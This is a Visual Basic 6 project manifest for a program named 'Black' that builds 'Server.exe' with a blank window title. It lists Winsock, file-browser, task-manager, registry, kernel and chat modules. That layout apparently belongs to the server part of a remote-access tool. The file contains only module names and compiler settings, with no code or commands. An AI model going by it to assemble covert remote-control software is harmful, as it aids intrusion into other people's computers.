Type=Exe
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\windows\System32\STDOLE2.TLB#OLE Automation
Object={248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0; MSWINSCK.OCX
Module=WinControl; Win_control.bas
Form=frm_main.frm
Module=FileBrowser; FileBrowser.bas
Module=Hardware; Hardware.bas
Module=Compression; Compression.bas
Module=TaskManager; TaskManager.bas
Module=Kernel; Kernel.bas
Module=ChatManager; ChatManager.bas
Class=Csocket; Csocket.cls
Module=Event_hwnd; Event_hwnd.bas
Module=Registry; Registry.bas
Module=Matrix; Matrix.bas
IconForm="frm_main"
Startup="frm_main"
HelpFile=""
Title=" "
ExeName32="Server.exe"
Command32=""
Name="Black"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
DebugStartupOption=0

[MS Transaction Server]
AutoRefresh=1
